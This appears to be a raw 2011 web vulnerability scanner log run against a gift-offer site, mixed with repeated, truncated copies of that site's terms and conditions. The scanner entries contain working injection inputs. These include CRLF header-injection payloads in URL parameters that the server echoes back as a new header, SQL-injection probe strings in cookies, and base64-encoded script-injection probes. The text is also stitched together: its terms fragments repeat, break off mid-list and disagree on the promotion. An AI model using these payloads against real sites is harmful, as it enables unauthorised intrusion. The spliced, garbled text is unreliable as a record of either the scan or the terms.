For this promotion, $250 in McDonald's&reg; Arch Cards&trade;, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent th..
- /info.htm

/info.htm

http://your-gift-zone.com/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=http://example.c..

Parameters

Parameter Type Value
tp GET tos
promo_name GET 2192name
catalog_id GET 13200
gift GET http://example.com/? ns: netsparker056650=vuln
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db832457e587r85;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,gift_cookie=http://example.com/?
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=2192name&gift=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $50 Gift Card, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent the Program</li>
<li>signing up for and immediately cancelling multiple offers</li>
<li>purchasing referrals or paying third party�s to complete Sponsor Offers;</li>
- /info.htm

/info.htm

http://your-gift-zone.com/info.htm?tp=tos&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056..

Parameters

Parameter Type Value
tp GET tos
promo_name GET http://example.com/? ns: netsparker056650=vuln
catalog_id GET 13200
gift GET 29617

Request

GET /info.htm?tp=tos&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&catalog_id=13200&gift=29617 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=; 1))>0=; 1))<255=; 1))>255=; 1))>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:15:20 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db83308cc0624ge;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=http://example.com/?,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $250 in McDonald's&reg; Arch Cards&trade;, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
